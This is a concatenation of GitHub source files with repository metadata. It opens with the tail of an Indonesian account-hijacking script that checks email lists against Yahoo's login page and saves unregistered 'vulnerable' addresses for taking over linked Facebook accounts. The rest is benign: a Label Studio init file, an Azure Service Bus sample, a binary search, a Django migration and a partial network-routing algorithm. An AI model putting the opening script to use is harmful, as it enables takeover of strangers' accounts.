print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/GrupMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_file():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
files = raw_input("\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;96m[!] \x1b[1;91mFile tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
mpsh = []
jml = 0
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
save = open('out/MailVuln.txt','a')
save.write("Email: "+ mail + '\n\n')
save.close()
berhasil.append(mail)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile Tersimpan \033[1;91m:\033[1;97m out/FileMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
if __name__=='__main__':
menu()
masuk() | [
"noreply@github.com"
] | dikaxyz.noreply@github.com |
cd875ae9154411e11bc7bbb1327119dc33fdb82b | 894f0bae6d13e5345e83d2eb8ef4c7b9af74cd67 | /label_studio_converter/__init__.py | a7078281d1dc6a1a2ea62f35a9adf9309be5b50d | [
"Apache-2.0"
] | permissive | rchuzh99/label-studio-converter | 8b971efbc577a5a5fb065fa442b298bca1ee08f5 | 9037271425964a96c3f06214e1d6e9b929427d40 | refs/heads/master | 2023-06-07T02:55:32.572636 | 2021-06-30T17:44:45 | 2021-06-30T17:44:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | from .converter import Converter
__version__ = '0.0.29'
| [
"makseq@gmail.com"
] | makseq@gmail.com |
c5e34b3d9082d716d3929ab37cc6b161f0b0a0ae | f87096577b8a509c182e25ab273e53d92d09ce7f | /sdk/servicebus/azure-servicebus/samples/async_samples/receive_deferred_message_queue_async.py | 76a55a185c77be2f4bf54674d204fcbea5fba5c4 | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | bradleydamato/azure-sdk-for-python | a47755f0b6f686e5a83c40a956485ccefb30e5ea | 4bde81cd274e91aead0c5d3d65632d10b44be79b | refs/heads/master | 2023-03-16T08:07:35.987865 | 2020-10-20T21:52:38 | 2020-10-20T21:52:38 | 300,750,124 | 0 | 0 | MIT | 2020-10-12T13:42:46 | 2020-10-02T22:32:37 | null | UTF-8 | Python | false | false | 2,063 | py | #!/usr/bin/env python
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
"""
Example to show receiving deferred message from a Service Bus Queue asynchronously.
"""
# pylint: disable=C0111
import os
import asyncio
from azure.servicebus import Message
from azure.servicebus.aio import ServiceBusClient
CONNECTION_STR = os.environ['SERVICE_BUS_CONNECTION_STR']
QUEUE_NAME = os.environ["SERVICE_BUS_QUEUE_NAME"]
async def main():
    """Send ten messages, defer them on receipt, then fetch and complete the
    deferred messages by sequence number.

    NOTE(review): performs live network I/O against the Service Bus namespace
    named by the SERVICE_BUS_* environment variables.
    """
    servicebus_client = ServiceBusClient.from_connection_string(conn_str=CONNECTION_STR)
    async with servicebus_client:
        # Send a batch of 10 messages that will subsequently be deferred.
        sender = servicebus_client.get_queue_sender(queue_name=QUEUE_NAME)
        messages = [Message("Message to be deferred") for _ in range(10)]
        async with sender:
            await sender.send_messages(messages)
        receiver = servicebus_client.get_queue_receiver(queue_name=QUEUE_NAME)
        async with receiver:
            received_msgs = await receiver.receive_messages(max_message_count=10, max_wait_time=5)
            # Defer each received message, remembering its sequence number so
            # it can be retrieved again below.
            deferred_sequenced_numbers = []
            for msg in received_msgs:
                print("Deferring msg: {}".format(str(msg)))
                deferred_sequenced_numbers.append(msg.sequence_number)
                await msg.defer()
            if deferred_sequenced_numbers:
                # Deferred messages can only be fetched explicitly by
                # sequence number.
                received_deferred_msg = await receiver.receive_deferred_messages(
                    sequence_numbers=deferred_sequenced_numbers
                )
                for msg in received_deferred_msg:
                    print("Completing deferred msg: {}".format(str(msg)))
                    await msg.complete()
            else:
                print("No messages received.")
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
print("Receive is done.")
| [
"noreply@github.com"
] | bradleydamato.noreply@github.com |
6fe06785c386a9016a2f59d60af27f95a518434d | dd663188feb9e546d73c633acd3e1ae862adef16 | /binary-search/bynary-search.py | ee321eb6c44f10a14d4242afe1194a6d35a2d798 | [] | no_license | madsonrda/coding-challenge | 969c64fd2aab038e17e7316f4653a490fd667576 | de6f8fa89a058296bdfeb5bcd4394b8a54f9f935 | refs/heads/master | 2020-04-15T01:01:55.309126 | 2019-01-14T00:47:35 | 2019-01-14T00:47:35 | 164,260,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | import math
def main():
'''
input:
first line is the integer value to be found in the sorted array
second line is a sorted integer list with the numbers separated by blank space.
ex:
2
1 2 4 7 9 11
'''
value = int(raw_input())
array = map(int,raw_input().split())
bs = BinarySearch(array,value)
print(bs)
def BinarySearch(array,value):
'''
array: sorted int list
value: value to be found in the list
return: if the value was found retunr the index of the list, else return -1
'''
l = 0
r = len(array) -1
pivot = int(math.floor((l+r)/2))
while l <= r:
if array[pivot] < value:
l = pivot + 1
pivot = int(math.floor((l+r)/2))
elif array[pivot] > value:
r = pivot -1
pivot = int(math.floor((l+r)/2))
else:
return pivot
return -1
if __name__ == '__main__':
main()
| [
"madsonrda@gmail.com"
] | madsonrda@gmail.com |
2a63f379dcc35040db9c3f77367104b8278216a0 | d3916619ec8e7365e9faf453a78c80cbaf14f4b0 | /app/GameOverv2.0.py | 8a1055f3e59b1bbb23253570d07d4d501fc94b4b | [] | no_license | SharapILN/DousonPython | 40990fef2d6e4bc2ecdc0b722c013cf6bf63b1e2 | c66c77ecc80f780914892da9191098787146968d | refs/heads/master | 2020-04-17T04:55:47.779325 | 2019-02-12T07:03:33 | 2019-02-12T07:03:33 | 166,253,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 811 | py | print('Программа "Game Over" 2.0')
print('То же', 'самое', 'сообщение')
print('Только',
'чуть-чуть',
'побольше')
print('Вот', end=' ')
print('оно...')
print(
"""
_____ ___ ___ ___ _____
/ ____| / | / |/ | | ___|
| | / /| | / /| /| | | |_
| | _ / ___ | / / |__/ | | | _|
| |_| | / / | | / / | | | |___
\_____/ /_/ |_| /_/ |_| |_____|
_____ _ _ _____ _____
/ _ \ | | / / | ___| | _ \
| | | | | | / / | |_ | |_| |
| | | | | | / / | _| | _ /
| |_| | | |/ / | |___ | | \ \
\_____/ |___/ |_____| |_| \_\
"""
)
input('\n\nНажмите Enter, чтобы выйти.')
| [
"sharap.iln@gmail.com"
] | sharap.iln@gmail.com |
f67df51e6d94d01fe71d5522766224636a66f792 | 2ed6c65b4b7c7052af630fe4fa187896b9d34573 | /test_app/migrations/0001_initial.py | b8c3b7132a25004a4faad346f57bce5d8b86f323 | [] | no_license | JpBongiovanni/UserDashboard | 26d1293b4a733f752c3d4bc543bea93a4a92df27 | 3df5fe21f12f6e689cd9c0c462cd312c05970904 | refs/heads/master | 2023-02-02T13:56:38.861766 | 2020-12-19T13:16:13 | 2020-12-19T13:16:13 | 321,970,534 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,450 | py | # Generated by Django 2.2 on 2020-12-17 12:02
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('registration_app', '0002_user_description'),
]
operations = [
migrations.CreateModel(
name='Wall_message',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('message', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('poster', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_messages', to='registration_app.User')),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('message', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('poster', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_comments', to='registration_app.User')),
],
),
]
| [
"jpbongiovanni@gmail.com"
] | jpbongiovanni@gmail.com |
b91aeaf6eccdee3cfd5c4046c3499f4acbf97480 | ac20f12a62f8177783301f54e8641d4359c6e933 | /__MC_ICC16_Alg1.py | dd391d7de73f3e2f9cc31db7f0f73f970564f6fa | [] | no_license | GZQZQQ/ryuappforalg1 | f356520373876ecef3a3c118fca9b37580ef9846 | e6fbb7788029d03adb1e7afa9b18f3f3a1358c7e | refs/heads/master | 2021-01-10T17:20:34.061123 | 2016-02-17T05:10:53 | 2016-02-17T05:10:53 | 49,276,002 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 55,163 | py | #coding=utf-8
##### 2015-09-13: Implement the Markov-Chain based approximated algorithm to solve MBSR problem.
##### 2016-01-20: Implement the thread-controlling alg1.(Huawei)
import random
import math
import time
import thread
class MC_ICC16_Alg:
    def __init__(self,*args):
        """Set up state for the Markov-Chain MBSR approximation and launch the
        algorithm in a background thread.

        args[0] is expected to be a network-monitor object; everything else is
        configured from the hard-coded trace-file names and parameters below.
        Side effects: opens two log files and starts the Keep_running_alg1 thread.
        """
        self.objNetworkMonitor = args[0]
        ### ==================== Given the Inputting paths between each Ctrler and SW-node.
        # Input trace files (read later by FuncReadTrace).
        self.PathData_file = '_PathSet.txt'; # global file-var
        self.Traffic_file = '_TrafficDemands.txt'; # global file-var
        self.Cap_links_file = '_Cap_links.txt'; # global file-var
        self.Cap_MBoxes_file = '_Cap_MBoxes.txt'; # global file-var
        #self.f1 = open("mcicc16_dugflie.txt",'w')
        #self.f1.write("get arg ok \n")
        #self.f1.write("why show \n")
        self.PathSet_cand = {} ## {(Src,Dst):[path1_id, path2_id,...,path_|Js|_id]}, the candidate path-set for all pairs.
        #self.f1.write("21 \n")
        #self.f1.flush()
        self.TDSet = {} ## {(Src):Rate}, the Traffic-Demand set of all Client-Flow.
        self.Cap_MBoxes = {} ## {MBox_id:CapVal}, the Capacity Middle-Boxes in Topology.
        #self.f1.write("31 \n")
        #self.f1.flush()
        self.Cap_links = {} ## {(u,v):CapVal}, the Capacity set of all links in Topology.
        #self.f1.write("41 \n")
        #self.f1.flush()
        self.Nodes_set = []; ## Record all nodes in topology graph.
        self.Edges_set = {}; ## {Edge_id:(u1,v1)}, Record all edges in topology.
        self.Paths_set = {}; ## { Path_id: [path_content:(path_src,next_node,...,path_dst)] }, Record all given paths in topology graph.
        #self.f1.write("51 \n")
        #self.f1.flush()
        self.list_MBoxDst_id = []; ## Middlebox-Connected-Switches. [10, 21, 33, 50]
        self.list_CFlowSrc_id = []; ## Client-Flow-Src-switches.
        ##==============================================================
        # Mutable solution state, updated while the algorithm runs.
        self.PathSet_selected = {} ## {(Src_CFlow,Dst_MBox):[path1_id,path2_id,...,[path_|Ds|]_id]}, the In-Use path for all CFs.
        self.MBoxSet_assigned = {} ## {(MBox_id):[CFlow1_id,CFlow2_id,...]}, the holding ClientFlows of each MiddleBox.
        self.Timers = {} ## {(Src):[ts_begin, timer_len, pathID_old, pathID_new, DstMBox_current, DstMBox_new]}, the timer-set for each (Src)-CFlow.
        ##==============================================================
        self.LogRun = open('Log_Alg1_running.txt','w')
        #self.Log_final_result = open('Log_Alg1_final_throughput.tr','w');
        self.Log_debug = open('Log_Alg1_debug_1.txt','w');
        self.TS_print = 0;## Time-stamp to be shown in log-files.
        ##========================== !!! Critical Parameters Setting: ====================================
        running_time_in_total = 120; ## total running time in seconds (NOTE: comment originally said 1200, the value here is 120 -- this time can be changed).
        step_to_check_timer_expiration = 0.01;## unit of time is second.
        stepCount_to_print_throughput = 100;## unit: 10 steps of one-timer_checking.
        self.Style_of_throughput_by_simulation_or_Mininet = 1 ## 1 indicates simulation; 0 represents mininet.
        # Run the whole algorithm asynchronously so the controller is not blocked.
        thread.start_new_thread(self.Keep_running_alg1, (running_time_in_total,
                        step_to_check_timer_expiration, stepCount_to_print_throughput))
        ##========================== !!! Critical Parameters Setting:##End of __init__():~
def get_pathSelected(self):
return self.PathSet_selected;
def get_pathSet(self):
return self.Paths_set;
def get_timeStamp(self):
ts_cur = self.TS_print;
return ts_cur;
#########################################################################################################################################
    def Keep_running_alg1(self, Total_running_time, Step_to_check_timer, StepCount_to_print_throughput ):
        """Main driver loop of Alg1 (runs in its own thread).

        Reads the trace files, builds an initial random assignment, arms a
        timer per client flow, then for Total_running_time seconds repeatedly
        checks for expired timers; on expiration it swaps the flow's host
        middlebox/path and RESETs all timers. Throughput is logged every
        StepCount_to_print_throughput loop iterations. Terminates its thread
        at the end via thread.exit_thread().
        """
        self.T = Total_running_time; ## Alg-parameter: Set The total running period of alg1 as 1200 seconds. (This time can be changed.)
        self.STEP_TO_CHECK_TIMER = Step_to_check_timer; ## Alg-parameter: The step (length of interval) of check timer-expiration.
        self.Ds = 1; ## Alg-parameter: Must be larger than 1 and smaller than |Js|.
        self.Beta = 5; ## Alg-parameter: The parameter in the theoretical derivation.
        self.Tau = 0; ## Alg-parameter: The alpha regarding the Markov_Chain.
        self.Log = open('Log_Alg1_Cost_STEP'+str(self.STEP_TO_CHECK_TIMER)+'.tr','w');
        # ===================================== Begin to run =========================================
        ## --- A. Read trace.
        self.FuncReadTrace(self.PathData_file, self.Traffic_file, self.Cap_links_file, self.Cap_MBoxes_file);
        ## --- B.1 Stage 0: Initialization.
        self.Initialization();
        _timeStamp_Begin_to_run = time.time(); ## Return the current-timeStamp, unit-time is second.
        self.LogRun.write( '_timeStamp_Begin_to_run: %f \n'%(_timeStamp_Begin_to_run) )
        self.LogRun.flush()
        ### --- B.2 Stage 1: Initialize self.Timers for all pairs.
        ## NOTE(review): Set_timer_for_all_CFlows and several methods called below
        ## (Replace_..., Delete_expired_..., Call_and_record_..., RESET, Fake_Replace_...,
        ## Write_down_..., Record_final_result) are defined elsewhere in this file.
        self.Set_timer_for_all_CFlows( _timeStamp_Begin_to_run );
        ## --- C. Enter into time-slot Count-Down process.
        current_ts = _timeStamp_Begin_to_run; ### Initialize the current_ts.
        step_times = 0;
        last_ts_to_check_timer = _timeStamp_Begin_to_run;
        Cumulative_Notification_times = 0;
        Cumulative_TimerCountDown_times = 0;
        self.Call_and_record_system_performance(current_ts,step_times,
                                                Cumulative_Notification_times,
                                                Cumulative_TimerCountDown_times);
        _timeStamp_alg_should_terminate = _timeStamp_Begin_to_run + self.T;
        while ( current_ts <= _timeStamp_alg_should_terminate ):
            RESET_Msg = 0;
            ##### -- C.1 listen to the event of any timer's expiration.
            Length_to_check_timers_experiation = self.STEP_TO_CHECK_TIMER;
            if ((current_ts - last_ts_to_check_timer) >= Length_to_check_timers_experiation ):
                ### --- C.1.0 Update the timer-checking time-slot.
                last_ts_to_check_timer = current_ts;
                ### --- C.1.1 Check self.Timers, if any timer is out, swap its relavant SrcCFlow's hostMBox and path.
                ret_timer_check_result = self.Check_expiration_of_timers(current_ts);
                if len(ret_timer_check_result)>0:
                    RESET_Msg = 1;
                    for key,val in ret_timer_check_result.items():
                        ### ---- C.1.1.1 Read the MBox-CFlow holding information.
                        Src_CFlow = key;
                        pathID_old = val[0];## Get the returned pathID_old.
                        pathID_new = val[1];## Get the returned pathID_new.
                        Dst_MBox_cur = val[2];## Get the returned Dst_MBox_cur.
                        Dst_MBox_new = val[3];## Get the returned Dst_MBox_new.
                        ### ---- And replace the old routing-path with the new selected routing-path for a Src_ClientFlow.
                        self.Replace_the_selected_DstMBox_and_Path_for_a_SrcCFlow( Src_CFlow, Dst_MBox_cur, Dst_MBox_new,
                                                                             pathID_old, pathID_new );
                        ## --- C.1.1.2 !!!! Clear-the-timeouted-timer-items.
                        self.Delete_expired_timer_items_after_replacement(Src_CFlow);
                        ### --- C.1.1.3 !!! Record the timer's time-out times.
                        Cumulative_TimerCountDown_times += 1;
            ##### -- C.2 listen to the event of any Controller's RESET Msg.
            if 1==RESET_Msg:
                #self.LogRun.write( '\n =================  RESET all self.Timers at ts [ %s ] :\n'%(current_ts) )
                #self.LogRun.flush()
                self.RESET(current_ts);
                #self.LogRun.write( '\n =================  End of RESET all self.Timers at ts [ %s ] :~\n'%(current_ts) )
                #self.LogRun.flush()
                ## !!! Record the times of RESET-Event(In each RESET-Event, a notification-event need to do).
                Cumulative_Notification_times += 1;
            ##### -- C.4 time flies, increase time-slot
            ###current_ts += self.STEP_TO_RUN;## Simulation-style.
            time.sleep( self.STEP_TO_CHECK_TIMER );
            current_ts = time.time();### Update the current_ts with now-time. This is the real-time-experiment style.
            step_times +=1;
            ##### -- C.5 record performance of system periodically.
            if ( 0 == step_times%StepCount_to_print_throughput ):
                Throughput = self.Get_objVal_of_configurations_in_whole_system();
                self.TS_print = current_ts - _timeStamp_Begin_to_run;
                self.LogRun.write('-TimeStamp\t%f\t-Throughput\t%s\n'%(self.TS_print, Throughput));
                self.LogRun.flush()
            if ( 0 == step_times%StepCount_to_print_throughput ):
                self.Call_and_record_system_performance(self.TS_print,step_times,Cumulative_Notification_times,Cumulative_TimerCountDown_times);
        ## ====== while :~
        # Final bookkeeping: dump the solution and close all log handles.
        self.Write_down_the_current_solution_MBox_Path_assignment(self.TS_print);
        self.Record_final_result(self.TS_print,step_times,Cumulative_Notification_times,Cumulative_TimerCountDown_times);
        self.Log.close();
        self.LogRun.close();
        #self.Log_final_result.close();
        self.Log_debug.close();
        ## ==== Finally, terminate this thread.
        thread.exit_thread()### End of this function :~
#########################################################################################################################################
# ==========================================================================================
    def FuncReadTrace(self,CandPaths_file,TrafficDemand_file,CapLinks_file,CapMBoxes_file):
        """Load the four input trace files into the in-memory data structures.

        Populates: Paths_set / PathSet_cand (candidate paths, ids assigned
        sequentially from 0), TDSet / list_CFlowSrc_id (traffic demands),
        Cap_links / Nodes_set / Edges_set (topology, links recorded in both
        directions), and Cap_MBoxes / list_MBoxDst_id (middlebox capacities).
        All node ids are kept as strings; all files are tab-separated.
        """
        # ---- 1 Read the Given path data :
        #global self.PathSet_cand;
        Global_path_id_idx = 0; ### The path_id is labelled from 0.
        with open(CandPaths_file,'r') as f:
            for lines in f:
                line=lines.strip('\n')
                lineContent = line.split('\t')
                Dst_id = str(lineContent[1]);
                Src_id = str(lineContent[3]);
                path = str(lineContent[7]);
                One_path = [];
                pathContent = path.split(">")
                for i in range(len(pathContent)-1,-1,-1):## Reverse the content of this path.
                    One_path.append(str(pathContent[i]));
                #############################
                path_id = Global_path_id_idx;
                Global_path_id_idx += 1;
                ## -- 1.1 record this path into the self.Paths_set.
                if path_id not in self.Paths_set.keys():
                    self.Paths_set[path_id] = One_path;
                ## -- 1.2 record this path into the self.PathSet_cand.
                if (Src_id,Dst_id) not in self.PathSet_cand.keys():
                    self.PathSet_cand[(Src_id,Dst_id)] = [];
                    self.PathSet_cand[(Src_id,Dst_id)].append(path_id);
                else:
                    self.PathSet_cand[(Src_id,Dst_id)].append(path_id);
        ### ---- 1 Read the Given path data :~
        # ---- 2 Read the Given self.TDSet data :
        #global self.TDSet, self.list_CFlowSrc_id;
        with open(TrafficDemand_file,'r') as f:
            for lines in f:
                line=lines.strip('\n')
                lineContent = line.split("\t")
                Src_id = str(lineContent[3]);
                Rate = str(lineContent[5]);
                ## --- record TD.
                if Src_id not in self.TDSet.keys():
                    self.TDSet[Src_id] = float(Rate);
                if Src_id not in self.list_CFlowSrc_id:
                    self.list_CFlowSrc_id.append(Src_id);
        ### ---- 2 Read the Given self.TDSet data :~
        # ---- 3 Read the Capacity of links and all nodes and all edges:
        #global self.Cap_links, self.Nodes_set, self.Edges_set;
        Global_edge_Idx = 0; ## From 0 to label the id of an edge.
        with open(CapLinks_file,'r') as f:
            for lines in f:
                line=lines.strip('\n')
                lineContent = line.split("\t")
                u_id = str(lineContent[1]);
                v_id = str(lineContent[3]);
                CapVal = float(lineContent[5]);
                # Links are undirected in the input: store both (u,v) and (v,u).
                if (u_id,v_id) not in self.Cap_links.keys():
                    self.Cap_links[(u_id,v_id)] = CapVal;
                if (v_id,u_id) not in self.Cap_links.keys():
                    self.Cap_links[(v_id,u_id)] = CapVal;
                ## --- record the nodes from topology.
                if u_id not in self.Nodes_set:
                    self.Nodes_set.append(u_id);
                if v_id not in self.Nodes_set:
                    self.Nodes_set.append(v_id);
                ## --- record the edges from topology.
                edge_id = Global_edge_Idx;
                Global_edge_Idx += 1;
                # NOTE(review): both branches below store the same value; the
                # else-branch is redundant but harmless.
                if edge_id not in self.Edges_set.keys():
                    self.Edges_set[edge_id] = (u_id,v_id);
                else:
                    self.Edges_set[edge_id] = (u_id,v_id)### ---- 3 Read the Capacity of links:~
        # ---- 4 Read the Capacity of Middle-Boxes:
        #global self.Cap_MBoxes;
        with open(CapMBoxes_file,'r') as f:
            for lines in f:
                line=lines.strip('\n')
                lineContent = line.split("\t")
                MBox_id = str(lineContent[1]);
                CapVal = float(lineContent[3]);
                ## --- 4.1 record Middlebox-Connected-Switches and Client-Flow-Src-switches.
                if MBox_id not in self.list_MBoxDst_id:
                    self.list_MBoxDst_id.append(MBox_id);
                ## --- 4.2 record the capacity of MBoxes.
                if MBox_id not in self.Cap_MBoxes.keys():
                    self.Cap_MBoxes[MBox_id] = CapVal# ---- 4 Read the Capacity of Middle-Boxes :~   ## --- End of this function :~
# ==========================================================================================
    def Initialization(self):
        """Stage 0: build a random initial assignment.

        For every client flow: pick one middlebox uniformly at random; if it
        is feasible (capacity check), bind the flow to it and randomly pick
        self.Ds candidate path(s) for the (flow, middlebox) pair, adopting a
        path only if it also passes the path-feasibility check. Flows whose
        random middlebox is infeasible stay unassigned in this stage.
        """
        ### ===== 1. Select target assigned MBox for each CFlow i.
        #self.Log_debug.write( "======= In Initialization, self.TDSet "+str(self.TDSet)+"\n" )
        #self.Log_debug.flush()
        #self.f1.write("91 \n")
        for id_CF in self.TDSet.keys():
            ## ===== 1.1 Rdmly select a target MBox j, then predict whether it is feasible.
            CNT_Mbox = len(self.list_MBoxDst_id);
            idx_MboxID_rdmlySelected = random.randint(0,CNT_Mbox-1);
            MboxID_rdmlySelected = self.list_MBoxDst_id[idx_MboxID_rdmlySelected];
            ## ===== 1.2 Check whether it is feasible to hold CFlow i.
            #self.f1.write("92 \n")
            bool_whether_tarMBox_feasible = self.Check_whether_tarMBox_feasible_to_a_CFlow(id_CF, MboxID_rdmlySelected);
            #self.Log_debug.write( "\t bool_whether_tarMBox_feasible "+str(bool_whether_tarMBox_feasible)+"\n" )
            #self.Log_debug.flush()
            #self.f1.write("93 \n")
            if (1==bool_whether_tarMBox_feasible):
                ### ---- 1.2.1 Update the MBox-CFlow holding information.
                self.MBox_trys_to_host_a_CFlow( MboxID_rdmlySelected, id_CF );
                #self.f1.write("94\n")
                ### ===== 1.2.2 Randomly Select a path for CFlow i and its designated MBox j.
                #self.Log_debug.write( "\t self.PathSet_cand " +str(self.PathSet_cand)+" ============ End of checking Pathset_cand.\n" )
                #self.Log_debug.flush()
                # Linear scan for the (id_CF, selected MBox) pair in the candidate set.
                for key,val in self.PathSet_cand.items():
                    Src = key[0];
                    Dst = key[1];
                    #self.f1.write("95 \n")
                    if (Src==id_CF and Dst==MboxID_rdmlySelected):
                        CNT_paths_cand = len(val);
                        ## -- 1.2.2.1. randomly select unique Ds(==1) paths for each pair (Src,Dst).
                        list_path_idxs = random.sample(xrange(0, CNT_paths_cand), self.Ds);
                        list_pathIDs_selected = [];
                        #self.f1.write("96\n")
                        for idx in list_path_idxs:
                            idx_found = self.PathSet_cand[key][idx]
                            #self.Log_debug.write("\t----idx_found "+str(idx_found)+"\n" )
                            #self.Log_debug.write("\t----list_path_idxs"+str(list_path_idxs)+"\n" )
                            list_pathIDs_selected.append( idx_found );
                        #self.f1.write("97 \n")
                        ## -- 1.2.2.2. initialize the self.PathSet_selected by the selected Ds paths.
                        Path_ID_newly_adopted = -1;
                        #self.Log_debug.write("\t----list_path_idxs"+str(list_path_idxs)+"\n" )
                        #self.Log_debug.write("list_pathIDs_selected"+" "+str(list_pathIDs_selected)+"\n")
                        for path_id in list_pathIDs_selected:
                            #self.f1.write("98 \n")
                            #self.Log_debug.write( Src+" -------> "+Dst+"\n")
                            if (Src,Dst) not in self.PathSet_selected.keys():
                                self.PathSet_selected[(Src,Dst)] = [];
                            #self.Log_debug.write("Path_ID_newly_adopted "+str(Path_ID_newly_adopted)+"\n" )
                            #self.Log_debug.write("path_id "+str(path_id)+"\n")
                            Path_ID_newly_adopted = path_id;
                        ### ---- !!! Before adopting this new path, judge whether it is feasible to this (s,d).
                        #### ----!! Before using the new-path, check whether it is still feasible to this Src_CFlow.
                        #self.Log_debug.write("Path_ID_newly_adopted " + str(Path_ID_newly_adopted)+"\n")
                        #self.f1.write("99 \n")
                        # NOTE(review): Check_whether_this_new_path_is_feasible_to_the_SrcCFlow
                        # is defined elsewhere in this file.
                        bool_whether_this_new_path_is_feasible = self.Check_whether_this_new_path_is_feasible_to_the_SrcCFlow(Src,Dst,Path_ID_newly_adopted);
                        #self.f1.write("100 \n")
                        #self.Log_debug.write( "\t====!!! bool_whether_this_new_path_is_feasible"+" "+str(bool_whether_this_new_path_is_feasible)+"\n" )
                        #print self.PathSet_selected[(Src,Dst)]
                        #print "\n"
                        #print "Path_ID_newly_adopted not in self.PathSet_selected[(Src,Dst)]:"
                        #print Path_ID_newly_adopted not in self.PathSet_selected[(Src,Dst)]
                        #print "\n"
                        if (1==bool_whether_this_new_path_is_feasible) and (Path_ID_newly_adopted not in self.PathSet_selected[(Src,Dst)]):
                            self.PathSet_selected[(Src,Dst)].append(Path_ID_newly_adopted)## --- End of this function :~
        #self.LogRun.write("\t------- In the END of Initialization: PathSet_selected "+ str(self.PathSet_selected)+"\n")
        #self.LogRun.flush()
# ================================================
def MBox_trys_to_host_a_CFlow(self, Mbox_ID, CFlow_ID ):
#global self.Cap_MBoxes;
### ---- 0.0 Check Mbox_ID is regular.
if -1==Mbox_ID:
return
### ---- 0.1 Check feasible of MBox.
second_check_feasible = self.Check_whether_tarMBox_feasible_to_a_CFlow(CFlow_ID, Mbox_ID);
if (0==second_check_feasible):
return
### ---- 1. Check Mbox_ID is regular.
if Mbox_ID >= 0:
if Mbox_ID not in self.MBoxSet_assigned.keys():
self.MBoxSet_assigned[Mbox_ID] = [];
### ---- 1.1 Bind the host-MBox and CFlow.
if CFlow_ID not in self.MBoxSet_assigned[Mbox_ID]:
self.MBoxSet_assigned[Mbox_ID].append( CFlow_ID );
pass##self.LogRun.write( '\t\t-- Bind -- CFlow_ID[ %d ] <--> Mbox_ID[ %d ] \n'%(CFlow_ID, Mbox_ID) )
pass##self.LogRun.write( '\t\t -- after Bind -- self.MBoxSet_assigned[ %d ]: %s \n'%(Mbox_ID, self.MBoxSet_assigned[Mbox_ID]) )
### ---- 1.1.1 Update the resouces information of host-MBox.
current_Cap_MBox = self.Cap_MBoxes[Mbox_ID];
consumed_Cap_by_CFlow = float(self.TDSet[CFlow_ID]);
self.Cap_MBoxes[Mbox_ID] = current_Cap_MBox - consumed_Cap_by_CFlow;
if self.Cap_MBoxes[Mbox_ID] < 0:
pass##self.LogRun.write( '\t\t==== WARN ==== self.Cap_MBoxes[ %d ] : %f\n'%(Mbox_ID, self.Cap_MBoxes[Mbox_ID]) )## --- End of this function :~
# ================================================
def MBox_removes_a_CFlow( self,Mbox_ID, CFlow_ID ):
#global self.Cap_MBoxes;
if Mbox_ID in self.MBoxSet_assigned.keys():
### ---- 1. Dis-Bind the host-MBox and CFlow.
if CFlow_ID in self.MBoxSet_assigned[Mbox_ID]:
self.MBoxSet_assigned[Mbox_ID].remove( CFlow_ID );
pass##self.LogRun.write( '\t\t~~ UnBind ~~ CFlow_ID[ %d ] --X-- Mbox_ID[ %d ] \n'%(CFlow_ID, Mbox_ID) )
